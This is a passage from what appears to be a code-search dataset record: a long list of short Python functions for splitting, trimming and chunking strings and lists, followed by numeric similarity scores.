'asdasdasd'\n assert lws.trim(s2) == 'asdasdasd'", "def _rsplit(value, sep, maxsplit=None):\n\tstr_parts = value.split(sep)\n\tif (maxsplit is not None) and (len(str_parts) > 1):\n\t\treturn [str.join(sep, str_parts[:-maxsplit])] + str_parts[-maxsplit:]\n\treturn str_parts", "def split(self, sep=None, maxsplit=None):\n return split(self, sep, maxsplit)", "def clean_tag(elmt_with_commas, max_lenght):\r\n elmt_list = elmt_with_commas.split(\",\")\r\n elmt_list = [e.strip() for e in elmt_list if len(e) < max_lenght]\r\n return elmt_list", "def dividir(l):\n\n\ta = []\n\tfor i in range(len(l)):\n\t\ta += l[i].split(' ')\n\treturn a[:100]", "def trim_to_upper_length_limit(self) -> None:\n self.trim_utils.lang_model = self.config['language_model']\n\n dataframe_splits = np.array_split(self.data, self.n_cores)\n pool = Pool(self.n_cores)\n self.data = pd.concat(pool.map(self.trim_text_for_dataframe, dataframe_splits))\n pool.close()\n pool.join()", "def check_list(list_obj, limit):\r\n if len(list_obj) > limit:\r\n num_of_lists = int(len(list_obj) / limit) + 1\r\n sublist = []\r\n k = 0\r\n while k < num_of_lists:\r\n x = list_obj[limit*k:limit*(k+1)]\r\n sublist.append(x)\r\n k += 1\r\n\r\n return sublist\r\n\r\n return list_obj", "def _truncate(self):\n dif = len(self) - self._maxLen\n if dif > 0:\n #return\n self[:dif] = []", "def split(self) -> List[String]:\n pass", "def trim_items(self, val):\n self.order_items = self.order_items[:val]", "def listsplit(value, arg):\n\n print \"listsplit:{0}\".format(arg)\n args = arg.split(\",\")\n if not len(args) == 2:\n return value\n\n i = int(args[0])\n n = int(args[1])\n\n m = len(value)\n\n base = m // n\n rem = m % n\n\n sizes = [base + 1] * rem + [base] * (n - rem)\n\n start = sum(sizes[0:i])\n end = start + sizes[i]\n\n return value[start:end]", "def truncate(x: str, limit: int) -> str:\n return \" \".join(x.split()[:limit])", "def explode(delim, val, limit = None): \n if limit != None:\n return val.split(delim, limit)\n else:\n return val.split(delim)", "def trim(self, start, end):", "def split_message(message, max_length):\n ms = []\n while len(message) > max_length:\n ms.append(message[:max_length])\n message = 
message[max_length:]\n ms.append(message)\n return ms", "def trimmedLength(self):\r\n\t\treturn (self.sourceLength - (self.trimEnd + self.trimStart))", "def splitter(self, lts, size, res=\"l\"):\n if res == \"l\":\n new_list = [lts[i:i + size] for i in range(0, len(lts), size)]\n elif res == \"s\":\n new_list = [\",\".join(lts[i:i + size])\n for i in range(0, len(lts), size)]\n\n return new_list", "def _FixLongList(self, long_list, chunk_size):\n split_list = []\n length = len(long_list)\n if length > chunk_size:\n list_size = chunk_size - 1\n pages, mod = divmod(length, list_size)\n if mod:\n pages += 1\n for page in range(pages):\n split_list.append(long_list[list_size * page:list_size * (page+1)])\n else:\n split_list.append(long_list)\n return split_list", "def _clean_list(self, items):\n itemlist = list(filter(None, items))\n if len(itemlist) < 3:\n itemlist.append(\"\")\n return itemlist\n\n return itemlist", "def __string_splitter(self, arr, string, split_length):\n if len(string) < split_length:\n arr.append(string)\n return arr\n else:\n arr.append(string[:split_length])\n return self.__string_splitter(arr, string[split_length:], split_length)", "def split(self, string, maxsplit=MAX_INT, include_separators=False):\n return self._split(\n string, maxsplit=maxsplit, include_separators=include_separators\n )", "def rsplit(self, sep=None, maxsplit=None):\n return rsplit(self, sep, maxsplit)", "def rsplit(self) -> List[String]:\n pass", "def split_text_by_max_size(text, max_size, split_token, is_list=False):\n # list of text sub strings of maximum length of max_size\n text_parts_list = list()\n # assuming sentences in text are divided by split token\n if is_list:\n sentence_list = split_list_by_token(text, split_token)\n else:\n sentence_list = text.split(split_token)\n\n # current part of text to concatenate sentences\n current_part = variable_initializer(is_list)\n\n # length of current part\n current_part_len = 0\n while sentence_list:\n # take next sentence\n current_sentence = sentence_list.pop(0)\n # check if empty string\n if len(current_sentence) == 0:\n continue\n # length of current sentence\n if is_list:\n current_sentence_tokens_count = len(current_sentence)\n else:\n current_sentence_tokens_count = len(current_sentence.split(' '))\n if current_part_len + current_sentence_tokens_count <= max_size:\n current_part = current_part + current_sentence\n current_part_len += current_sentence_tokens_count\n else:\n # insert last legitimate part\n text_parts_list.append(current_part) if current_part_len > 0 else None\n # check that current sentence is in legitimate length\n if len(current_sentence) <= max_size:\n # update incremental part with last legitimate length of current sentence\n current_part = current_sentence # TODO: debug with string and with long comments, make sure doesnt loose parts in the middle\n current_part_len = current_sentence_tokens_count\n else:\n # split current sentence to valid lengths\n num_split = math.ceil(len(current_sentence) / max_size)\n splited_current_sentence = [l.tolist() for l in np.array_split(current_sentence, num_split)]\n text_parts_list += splited_current_sentence\n current_part = variable_initializer(is_list)\n current_part_len = 0\n # in case entire text never crossed max_size or last part didn't..\n if current_part in text_parts_list:\n return text_parts_list\n else:\n text_parts_list.append(current_part) if current_part_len > 0 else None\n return text_parts_list", "def trim(self, val, collections=None):\n \n if isinstance(val, str):\n 
val = int(val)\n \n if collections is None:\n self.img_lst = self.img_lst[:val]\n else:\n new_imgs = []\n for c in collections:\n imgs = [img for img in self.img_lst if img.get_metadata()\\\n ['collectionId'] == c]\n if len(imgs) < val:\n new_imgs += imgs\n else:\n new_imgs += imgs[:val]\n \n self.img_lst = new_imgs", "def __trim(self, f, m, l, template, delim='{'):\n for item in [(delim + e) for e in template.split(delim) if e]:\n # Check if use specifies length > Look for '}[#]'\n if re.search(\"}\\[[-]?[0-9]+\\]\", item):\n trim = int(re.search(\"\\[([-]?[0-9]+)\\]\", item).group(1))\n name = re.search(\"\\{(.+)\\}\", item).group(1)\n\n if name in [\"first\", \"f\"]:\n f = f[:trim]\n\n elif name in [\"middle\", \"m\"]:\n m = m[:trim]\n\n elif name in [\"last\", \"l\"]:\n l = l[:trim]\n\n return (f, m, l)", "def question_15(list_str: str) -> str:\n return max(list_str, key=len)", "def pickTrimString(trimChannels, length, maxTrim):\n if (trimChannels=='auto'):\n trimString = 'auto_max=%g' % pickAutoTrimChannels(length, maxTrim)\n else:\n trimString = '%g' % trimChannels\n return(trimString)", "def rsplit(self, by=None, maxsplit=-1):\n res = []\n end = len(self)\n drop_spaces = by is None\n if drop_spaces:\n by = \" \"\n bylen = len(by)\n if bylen == 0:\n raise ValueError(\"empty separator\")\n\n while maxsplit != 0:\n next = self._clean_string.rfind(by, 0, end)\n if next < 0:\n break\n # Get character codes after the index as well.\n res.append(self[next + bylen : end])\n end = next\n maxsplit -= 1 # NB. if it's already < 0, it stays < 0\n\n res.append(self[:end])\n res.reverse()\n if drop_spaces:\n return [part for part in res if part != \"\"]\n return res", "def parse_trim(config):\n config['bins'] = _parse_list_of_lists(config['bins'], delimiter_elements='-', delimiter_lists=',')\n return config", "def split_list(list_in,number_of_pieces):\n output_length = len(list_in) / number_of_pieces\n output = []\n piece = []\n counter = 0\n for list_item in list_in:\n counter += 1\n piece.append(list_item)\n if counter >= output_length:\n output.append(piece)\n counter = 0\n piece = []\n # Make sure nothing is missed\n if len(piece) > 0:\n output.append(piece)\n return output", "def delimit(self):\n pass", "def pickAutoTrimChannels(length, maxTrim):\n trimChannels = 0.1\n if (length*trimChannels > maxTrim):\n casalogPost(\"pickAutoTrimChannels(): set trimChannels = %d because %.0f > %d\" % (maxTrim,length*trimChannels,maxTrim))\n trimChannels = maxTrim\n return(trimChannels)", "def split(base_list):\n list_mid_pointer=len(base_list)//2\n return base_list[:list_mid_pointer],base_list[list_mid_pointer:]", "def ltrim(val, chars = None):\n if chars != None:\n return val.lstrip(chars)\n else:\n return val.lstrip()", "def split_list(a_list):\n half = len(a_list)/2\n return a_list[:half], a_list[half:]", "def trim(elements, n):\n if len(elements) >= n: # if there are enough elements,\n elements[:n] = True # set `n` to `True` and leave\n return elements # the rest to `False`.", "def splitListIntoContiguousListsAndTrim(channels, trimChannels=0.1, \n maxTrim=maxTrimDefault, \n maxTrimFraction=1.0, verbose=False):\n if type(trimChannels) != str:\n if (trimChannels <= 0):\n return(np.array(channels))\n length = len(channels)\n trimChannelsMode = trimChannels\n if (trimChannels == 'auto'):\n trimChannels = pickAutoTrimChannels(length, maxTrim)\n mylists = splitListIntoContiguousLists(channels)\n channels = []\n trimLimitForEdgeRegion = 3\n for i,mylist in enumerate(mylists):\n trimChan = trimChannels\n if 
verbose:\n print \"trimChan=%d, Checking list = \" % (trimChan), mylist\n if (trimChannels < 1):\n trimChan = int(np.ceil(len(mylist)*trimChannels))\n if verbose:\n print \"since trimChannels=%s<1; reset trimChan=%d\" % (str(trimChannels),trimChan)\n if (trimChannelsMode == 'auto' and 1.0*trimChan/len(mylist) > maxTrimFraction):\n trimChan = int(np.floor(maxTrimFraction*len(mylist)))\n if verbose:\n print \"trimChan for this window = %d\" % (trimChan)\n if (len(mylist) < 1+trimChan*2):\n if (len(mylists) == 1):\n # If there was only one list of 1 or 2 channels, then don't trim it away!\n channels += mylist[:1]\n continue\n # Limit the trimming of the edge closest to the edge of the spw to 3 channels,\n # in order to preserve bandwidth.\n if (i==0 and trimChan > trimLimitForEdgeRegion):\n if (len(mylists)==1):\n # It is the only window so limit the trim on the far edge too\n channels += mylist[trimLimitForEdgeRegion:-trimLimitForEdgeRegion]\n else:\n channels += mylist[trimLimitForEdgeRegion:-trimChan]\n elif (i==len(mylists)-1 and trimChan > trimLimitForEdgeRegion):\n channels += mylist[trimChan:-trimLimitForEdgeRegion]\n else:\n # It is not an edge window, or it is an edge window and trimChan<=3\n channels += mylist[trimChan:-trimChan]\n return(np.array(channels))", "def splitnstrip(self, string, symbol=\":\", maxsplit=1):\n if symbol not in string:\n return None\n\n return self.stripall(string.split(symbol, maxsplit))", "def getSpaceTokenList(token, listSEs, jobCloud, analysisJob, fileListLength, si, alt=False):\n\n # check if there are any space tokens\n if token == [''] and fileListLength > 1:\n # correct length of empty list\n token = token*fileListLength\n tolog(\"Corrected length of empty space token list from 0 to %d\" % len(token))\n\n # no space tokens for tier 3s\n if not si.isTier3():\n token_list = getProperSpaceTokenList(token, listSEs, jobCloud, analysisJob, alt=alt)\n else:\n token_list = None\n\n return token_list", "def split(mylist,size):\r\n\r\n split_list = []\r\n\r\n for index,num in enumerate(mylist):\r\n if index + size <= len(mylist):#checks so we don't go out of list range\r\n position = mylist.index(num,index)\r\n split_list.append(mylist[position:position+size])\r\n return split_list", "def trim_items(self, max_images):\n \n if max_images is not None:\n counter = int(max_images)\n for order in self.order_lst:\n items = order.get_items()\n if len(items) < counter:\n trim_val = len(items)\n order.trim_items(trim_val)\n counter -= trim_val\n else:\n order.trim_items(counter)\n counter = 0", "def break_list_to_sub_list(self, full_list, chunk_size = 45):\n if chunk_size < 1:\n chunk_size = 1\n return [full_list[i:i + chunk_size] for i in range(0, len(full_list), chunk_size)]", "def truncate(self, parts_a: List[Tuple[List[int], bool]], parts_b: List[Tuple[List[int], bool]], answer: List[int],\n max_length: int):\n total_len = self._seq_length(parts_a) + self._seq_length(parts_b)\n if answer:\n total_len += len(answer)\n total_len += num_special_tokens_to_add(\n parts_a, parts_b, answer, add_cls=True, add_sep=False, add_piece=True)\n num_tokens_to_remove = total_len - max_length\n\n if num_tokens_to_remove <= 0:\n return False\n\n for _ in range(num_tokens_to_remove):\n if self._seq_length(parts_a, only_shortenable=True) > self._seq_length(parts_b, only_shortenable=True):\n self._remove_last(parts_a)\n else:\n self._remove_last(parts_b)\n return True", "def limit(requestContext, seriesList, n):\n return seriesList[0:n]", "def ltrim(self, name, start, end):\n 
self.connect()\n self._write('LTRIM %s %s %s\\r\\n' % (name, start, end))\n return self._get_simple_response()", "def split_lod_by_char(lod, max_chars=10000000):\n max_chars = min(max_chars, SF_BULK_MAX_CHAR)\n num_char_item = []\n for item in lod:\n num_char_item.append(num_char([item]))\n num_char_item_cumm = list(np.cumsum(num_char_item))\n x = num_char_item_cumm.copy()\n splited = []\n last = 0\n for i in range(0, len(x) - 1):\n if x[i + 1] > max_chars:\n # print(x[i+1], x[i],i)\n x[i + 1:] = list(np.add(x[i + 1:], [-x[i]] * len(x[i + 1:])))\n x[:i + 1] = [0] * len(x[:i + 1])\n splited.append(lod[last:i + 1])\n last = i + 1\n # print('x depois:',x)\n if last <= len(x):\n splited.append(lod[last:len(x)])\n return splited", "def Split(ar, size):\r\n return [ar[i:i + size] for i in range(0, len(ar), size)]", "def question_16(list_str: str) -> str:\n return min(list_str, key=len)", "def split_list(l, ratio=0.75):\n i = int(ratio * len(l))\n return l[:i], l[i:]", "def trimsplit(args):\n from jcvi.utils.cbook import SummaryStats\n\n p = OptionParser(trimsplit.__doc__)\n p.add_option(\n \"--minlength\", default=1000, type=\"int\", help=\"Min length of contigs to keep\"\n )\n opts, args = p.parse_args(args)\n\n if len(args) != 1:\n sys.exit(not p.print_help())\n\n (fastafile,) = args\n minlength = opts.minlength\n\n fw = must_open(fastafile.rsplit(\".\", 1)[0] + \".split.fasta\", \"w\")\n ntotal = 0\n removed = []\n Ns = []\n for name, seq in parse_fasta(fastafile):\n stretches = []\n ntotal += len(seq)\n for lower, stretch in groupby(seq, key=lambda x: x.islower()):\n stretch = \"\".join(stretch)\n if lower or len(stretch) < minlength:\n removed.append(len(stretch))\n continue\n for isN, s in groupby(stretch, key=lambda x: x in \"Nn\"):\n s = \"\".join(s)\n if isN or len(s) < minlength:\n Ns.append(len(s))\n continue\n stretches.append(s)\n for i, seq in enumerate(stretches):\n id = \"{0}_{1}\".format(name.split(\"|\")[0], i)\n s = SeqRecord(Seq(seq), id=id, description=\"\")\n SeqIO.write([s], fw, \"fasta\")\n fw.close()\n\n # Reporting\n if removed:\n logging.debug(\n \"Total bases removed: {0}\".format(percentage(sum(removed), ntotal))\n )\n print(SummaryStats(removed), file=sys.stderr)\n if Ns:\n logging.debug(\"Total Ns removed: {0}\".format(percentage(sum(Ns), ntotal)))\n print(SummaryStats(Ns), file=sys.stderr)", "def _split_input_list(str_list):\r\n\r\n new_list = re.split(r'[\\n\\r\\s,]', str_list)\r\n new_list = [s.strip() for s in new_list]\r\n new_list = [s for s in new_list if s != '']\r\n\r\n return new_list", "def testSplit(self):\n\n s = StrObject(u\"first second\")\n result = s.call(u\"split\", [StrObject(u\" \")])\n pieces = [obj._s for obj in unwrapList(result)]\n self.assertEqual(pieces, [u\"first\", u\"second\"])", "def split(self, by=None, maxsplit=-1):\n drop_spaces = by is None\n if drop_spaces:\n by = \" \"\n\n bylen = len(by)\n if bylen == 0:\n raise ValueError(\"empty separator\")\n\n res = []\n start = 0\n while maxsplit != 0:\n next = self._clean_string.find(by, start)\n if next < 0:\n break\n # Get character codes after the index as well.\n res.append(self[start:next])\n start = next + bylen\n maxsplit -= 1 # NB. 
if it's already < 0, it stays < 0\n\n res.append(self[start : len(self)])\n if drop_spaces:\n return [part for part in res if part != \"\"]\n return res", "def trim(args) :\n from trimmer import trim_reads\n trim_reads(args)", "def five(ls):\n return ls[:5]", "def remove_shorts(word_list, minimum_length):\n\tworking_word_list = []\n\tfor word in word_list:\n\t\tif len(word) >= minimum_length:\n\t\t\tworking_word_list.append(word)\n\treturn working_word_list", "def _chunk_list(list_to_chunk, chunk_length):\n return [list_to_chunk[i:i+max(1, chunk_length)] for i in range(0, len(list_to_chunk), max(1, chunk_length))]", "def setSplitLength(self, value):\n return self._set(splitLength=value)", "def ghetto_split(list_, chunk_size=100):\n logging.debug(f\"Splitting list of {len(list_)} length, chunk size = {chunk_size}\")\n split_lists = []\n for i in range(0,len(list_),chunk_size):\n split_lists.append(list_[i:i+chunk_size])\n logging.debug(f\"List has been split into {len(split_lists)} lists. Total num of elements in split lists is {sum([len(i) for i in split_lists])}\")\n return split_lists", "def split_array(array, max_len=2000):\n new_array_lst = []\n for x in range(0, len(array), max_len):\n split = array[x: x + max_len]\n if len(split) >= max_len:\n new_array_lst.append(split)\n\n return new_array_lst", "def split_string(source,splitlist):\n\tspaces = \" \" * len(splitlist)\n\ttranstable = string.maketrans(splitlist, spaces)\n\tsource = string.translate(source, transtable)\n\treturn source.split()", "def cut_in_words(self,linea):\n length = 0\n res = ''\n limit_screen = 30\n for word in linea.split(' '):\n if length + len(word) <= limit_screen:\n new_word = word + ' '\n length += len(new_word)\n else:\n new_word = '\\n' + word + ' '\n length = len(new_word) - 2 #-2 para no tener en cuenta el \\n\n res += new_word\n return res", "def hard_words(a_list):\n\n return [word for word in a_list if len(word) > 7]", "def __size_restriction_correct_string_list(self):\n\n strTestName = 'String size higher or equal to the size of a list (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('lRefParameter1', 'List ref. 
parameter')\n RxCSObject.paramType('lRefParameter1', list)\n\n # Now, let me define a string\n RxCSObject.paramAddMan('parameter1', 'String parameter')\n RxCSObject.paramType('parameter1', str)\n RxCSObject.paramSizHE('parameter1', 'lRefParameter1')\n\n RxCSObject.lRefParameter1 = [4, 5, 8, 9]\n RxCSObject.parameter1 = 'abbce'\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def cut_in_lines(self,line):\n limit_screen = 30 #caracteres que tiene de ancho la pantalla\n length = 0 #para comparar leineas\n res = ''\n\n for linea in line.split('\\n'):\n if length + len(linea) <= limit_screen:\n new_linea = linea\n length += len(new_linea)\n else:\n if len(linea) > limit_screen:\n linea = self.cut_in_words(linea)\n new_linea = '\\n' + linea\n length = len(new_linea) - 2 #-2 para no tener en cuenta el \\n\n res += new_linea\n return res", "def clip_string_list(a, max_len, continue_str='…'):\n return [x if len(x) <= max_len else x[:max_len - len(continue_str)] + '…' for x in a]", "def rsplit(a, sep=None, maxsplit=None):\n # This will return an array of lists of different sizes, so we\n # leave it as an object array\n return _vec_string(\n a, object_, 'rsplit', [sep] + _clean_args(maxsplit))", "def LTrim(text):\n return str(text).lstrip()", "def list_strip(line: list):\n new_line = [field.strip() for field in line]\n if new_line != line:\n tpl = \"Removed trailing whitespaces in fields of line: {}\"\n msg = tpl.format(line)\n warnings.warn(msg, ParseIsatabWarning)\n return new_line", "def split(a, sep=None, maxsplit=None):\n # This will return an array of lists of different sizes, so we\n # leave it as an object array\n return _vec_string(\n a, object_, 'split', [sep] + _clean_args(maxsplit))", "def rsplit(s, sep, maxsplits=0):\n L = s.split(sep)\n if not 0 < maxsplits <= len(L):\n return L\n return [sep.join(L[0:-maxsplits])] + L[-maxsplits:]", "def seperate_list(list, division_part):\n avg = len(list) / float(division_part)\n out = []\n last = 0.0\n\n while last < len(list):\n out.append(list[int(last):int(last + avg)])\n last += avg\n return out", "def split_lod(lod, max_items=10000, max_chars=10000000):\n if type(lod) != list:\n raise ValueError(\"{}: lod must be of type list\".format(\"split_lod\"))\n\n splited_final = []\n for splited_partial in split_lod_by_item(lod, max_items=max_items):\n splited_final.extend(\n split_lod_by_char(splited_partial, max_chars=max_chars))\n return splited_final", "def smart_split(x):\n return R_SPLIT_DELIM.split(x)", "def filter_long_words(list,n):\n numberlist=[]#set up a new list\n for i in range(0,len(list)):\n if len(list[i]) > n:#pick up the word that is longer than n\n numberlist.append(list[i])#count the length of each word\n else:\n continue\n return numberlist", "def test_sanitized_trim(self):\n value = \" sample \"\n response = clean.trim(value)\n assert response == \"sample\"\n assert type(response) == str", "def list_split(self, l1, n=1):\n if (len(l1) % n) == 0:\n m = len(l1) // n\n else:\n m = len(l1) // n + 1\n l2 = [l1[i * n:(i + 1) * n] for i in range(m)]\n return l2", "def filter_record(self, record):\n if len(record) >= self.max_length:\n return record[:self.max_length]\n else:\n return record", "def trimming(self, trimming):\n allowed_values = [\"None\", \"Character\", \"Word\", \"EllipsisCharacter\", \"EllipsisWord\", \"EllipsisPath\"] # noqa: E501\n if not trimming.isdigit():\t\n if trimming not in allowed_values:\n raise ValueError(\n \"Invalid value for `trimming` ({0}), must be one of {1}\" # noqa: E501\n 
.format(trimming, allowed_values))\n self._trimming = trimming\n else:\n self._trimming = allowed_values[int(trimming) if six.PY3 else long(trimming)]", "async def split_list(arr, size=100):\n\n arrs = []\n\n while len(arr) > size:\n pice = arr[:size]\n arrs.append(pice)\n arr = arr[size:]\n\n arrs.append(arr)\n return arrs", "def Split(text, delimiter=\" \", limit=-1, compare=None):\n if compare is not None:\n raise VB2PYNotSupported(\"Compare options for Split are not currently supported\")\n #\n if limit == 0:\n return VBArray(0)\n elif limit > 0:\n return Array(*str(text).split(delimiter, limit - 1))\n else:\n return Array(*str(text).split(delimiter))", "def splitlines(self) -> List[String]:\n pass", "def __split_seq(self, sequence):\n seq = copy.copy(sequence)\n result = \"\"\n while len(seq) > self._max_len:\n if seq[self._max_len] == \"\":\n result += seq[:self._max_len] + \"\\n\"\n seq = seq[self._max_len:]\n else:\n whitespace_index = self._max_len - seq[:self._max_len][::-1].find(\" \")\n result += seq[:whitespace_index] + \"\\n\"\n seq = seq[whitespace_index:]\n result += seq\n return result", "def split_text(text: Union[str, List], max_size: int = 2000, delimiter: str = \"\\n\") -> List[str]:\n delim_length = len(delimiter)\n\n if isinstance(text, str):\n if len(text) < max_size:\n return [text]\n text = text.split(delimiter)\n else:\n if sum(len(i) for i in text) < max_size:\n return [\"\\n\".join(text)]\n\n output = []\n tmp_str = \"\"\n count = 0\n for fragment in text:\n fragment_length = len(fragment) + delim_length\n if fragment_length > max_size:\n raise ValueError(\"A single line exceeded the max length. Can not split!\") # TODO: Find a better way than throwing an error.\n if count + fragment_length > max_size:\n output.append(tmp_str)\n tmp_str = \"\"\n count = 0\n\n count += fragment_length\n tmp_str += f\"{fragment}{delimiter}\"\n\n output.append(tmp_str)\n\n return output", "def split(long_string, length):\r\n lines = []\r\n words = long_string.split(' ')\r\n line = ''\r\n while len(words) != 0:\r\n if line == '':\r\n line = words.pop(0)\r\n elif len(line) + len(words[0]) + 1 < length:\r\n line += ' ' + words.pop(0)\r\n else:\r\n lines.append(line)\r\n line = ''\r\n lines.append(line)\r\n return lines", "def truncate_ocr_sim_list(token, ocr_sims_list, limit=10):\n if len(ocr_sims_list) <= limit:\n return ocr_sims_list\n\n ocr_scores = set([sc for sim, sc in ocr_sims_list.items()])\n\n # Limit of 10 different scores allowed\n sorted_ocr_scores = sorted(ocr_scores, reverse=True)[:limit]\n ocr_list = []\n for score in sorted_ocr_scores:\n tmp_ocr_list = [ocr_sims for ocr_sims, ocr_score in ocr_sims_list.items() if ocr_score == score]\n\n if len(ocr_list) + len(tmp_ocr_list) > limit:\n list_len = limit - len(ocr_list)\n tmp_list = []\n\n while len(tmp_list) < list_len:\n tmp_list += select_lower_edit_distance(token, tmp_ocr_list)\n\n if len(ocr_list) + len(tmp_list) == limit: # Final list has exactly 10 elements\n ocr_list += tmp_list\n break\n else: # List has more than 10 arguments (need to chose only the n elements needed)\n alpha_tmp_list = []\n\n while len(alpha_tmp_list) != list_len:\n alpha_word = select_best_alphabetical_word(token, tmp_list)\n\n alpha_tmp_list.append(alpha_word)\n tmp_list = [tkn for tkn in tmp_list if tkn != alpha_word]\n\n ocr_list += alpha_tmp_list\n break\n elif len(ocr_list) + len(tmp_ocr_list) == limit:\n ocr_list += tmp_ocr_list\n break\n else: # len(ocr_list) + len(tmp_ocr_list) < limit\n ocr_list += tmp_ocr_list\n\n if len(ocr_list) != 
limit:\n raise IndexError(\"OCR list is still too big (\"+str(len(ocr_list))+\"/\"+str(limit)+\")\")\n\n return {tkn: ocr_sims_list[tkn] for tkn in ocr_list}", "def splitCount(self):\n return 0", "def abridged_str_from_list(self,\r\n entrylist,\r\n trim_length=0,\r\n override=False):\r\n\r\n if override:\r\n trim_length = KEYLENGTH\r\n if trim_length == 0:\r\n trim_length = self.default_dict['keytrim']\r\n\r\n returntext = EMPTYCHAR\r\n for term in entrylist:\r\n lastlength = len(returntext)\r\n returntext += term+', '\r\n if len(returntext) > trim_length:\r\n if lastlength > trim_length-10:\r\n return returntext[0 : lastlength-2]\r\n return returntext[:trim_length]\r\n return returntext[:-2]", "def __cleaning_split(self, text: str) -> list:\n splitted_word = self.__clean_text(text)\n splitted_word = splitted_word.split()\n return splitted_word", "def splitLine(string, overflow=70):\n w=[]\n n=len(string)\n for i in range(0,n,overflow):\n w.append(string[i:i+overflow])\n return w", "def cleanList(self, mylist):\r\n newlist = []\r\n for val in mylist:\r\n if val.strip() != '':\r\n newlist.append(val)\r\n myList = sorted(set(newlist))\r\n\r\n return newlist", "def get_first_non_empty(inputList, num):\n i = num\n outputList = []\n for item in inputList:\n if item.strip() == '':\n continue\n outputList.append(item.strip())\n i -= 1\n if i <= 0:\n break\n return outputList" ]
[ "0.61260587", "0.61242557", "0.60332996", "0.5976751", "0.59576887", "0.59357154", "0.59291357", "0.575979", "0.5731277", "0.56639487", "0.5637736", "0.5636854", "0.5605196", "0.5510604", "0.5455997", "0.54495543", "0.5449324", "0.544276", "0.54360414", "0.5429126", "0.54289603", "0.5424462", "0.5389596", "0.53759766", "0.5372024", "0.53625154", "0.53508806", "0.53421175", "0.53420347", "0.53279", "0.5282323", "0.5255473", "0.52456754", "0.5229721", "0.5221196", "0.5216531", "0.52129716", "0.52050024", "0.52006924", "0.5197693", "0.5196247", "0.51841164", "0.5181099", "0.5178952", "0.51695496", "0.5166754", "0.5148017", "0.5130183", "0.5117873", "0.5113257", "0.5110655", "0.5105287", "0.51010746", "0.5100124", "0.50941056", "0.5090288", "0.5089092", "0.50854343", "0.50749505", "0.5074813", "0.5069294", "0.50684714", "0.5065664", "0.5054085", "0.50524706", "0.5046033", "0.5042904", "0.5040696", "0.5034173", "0.50332737", "0.50208277", "0.50199246", "0.5018266", "0.5015818", "0.5010028", "0.5007935", "0.4996861", "0.49892518", "0.4981521", "0.4969872", "0.49661192", "0.49597844", "0.4943847", "0.49387836", "0.49381733", "0.4935854", "0.492607", "0.49240234", "0.4917535", "0.49131387", "0.49129203", "0.49071586", "0.49043685", "0.49040428", "0.49030456", "0.49021962", "0.48972136", "0.48911962", "0.4887064", "0.48854208" ]
0.66803694
0
It decrypts encrypted messages.
def test_decrypt_encrypted(self):
    encrypted = encrypt('message')
    decrypted = decrypt(encrypted)
    assert decrypted == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decrypt_message(encrypted_message):", "def decrypt(self, data):", "def decrypt_message(self):\r\n\r\n\t\t#Will not let user input useless messages that cannot be decrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to decrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Your decrypted message is\")\r\n\t\tprint(self.my_code + \"|\")", "def decrypt_message(self, encrypted_message):\n f = Fernet(bytes(self.key))\n decrypted_message = f.decrypt(encrypted_message)\n return decrypted_message", "def decrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.decrypt(message)", "def _decrypt(self, msg):\r\n # they must be real crypto experts at pubnub.com\r\n # two lines of code and two capital mistakes :-(\r\n # pylint: disable=E1101\r\n key = hashlib.sha256(self.cipher).hexdigest()[0:32]\r\n aes = AES.new(key, AES.MODE_CBC, \"0123456789012345\")\r\n decrypted = aes.decrypt(base64.decodestring(msg))\r\n return json.loads(decrypted[0:-ord(decrypted[-1])])", "def decrypt(self, message):\n output = []\n for letter in message:\n # preventing white spaces and numbers\n if letter == ' ' or isinstance(letter, int):\n output.append(letter)\n else:\n idx_in_plain = self.CIPHER_TEXT_ALPH.index(letter.upper())\n output.append(self.PLAIN_TEXT_ALPH[idx_in_plain])\n return \"\".join(output)", "def decrypt(self, msg):\n if self.security_type is not None and self.security_type != 0:\n res, used, _ = gss.unwrap(self.ctx, msg)\n isconf = self.security_type == gss.RequirementFlag.confidentiality\n if (not used and isconf):\n raise GSSClientError('User requested encryption, '\n 'but the server sent an unencrypted '\n 'message!')\n return res.decode('utf-8')\n else:\n return msg.decode('utf-8')", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def decrypt_message(self, cipher):\n\t\tmessage = cipher ** self.private_key % self.hidden_primes_product\n\t\treturn message", "def decrypt(self, message):\n return self._keypair.decrypt(message)", "def decrypt_message(encrypted_message):\r\n\r\n # conversion to bytes\r\n encrypted_message = bytes(encrypted_message, \"ascii\")\r\n\r\n # loading key\r\n key = load_key()\r\n\r\n # creating a fernet object\r\n f = Fernet(key)\r\n\r\n # decrypting the messsage\r\n decrypted_message = f.decrypt(encrypted_message)\r\n\r\n return decrypted_message.decode()", "def decrypt(self, text):\n return self.encrypt(text)", "def decryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n decoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code-key\n new = chr(change)\n string += new\n key += key_increment\n decoded = ''.join(string)\n return ('Decoded Message:\\t' + decoded)", "def decrypt(self, ciphertext):\n return self._transform(ciphertext, self._backward)", "async def decrypt(self, message: Message, jid: Optional[JID], tab: ChatTab):\n\n raise NotImplementedError", "def decrypt(self, message):\n #check validity of _private_key\n if 
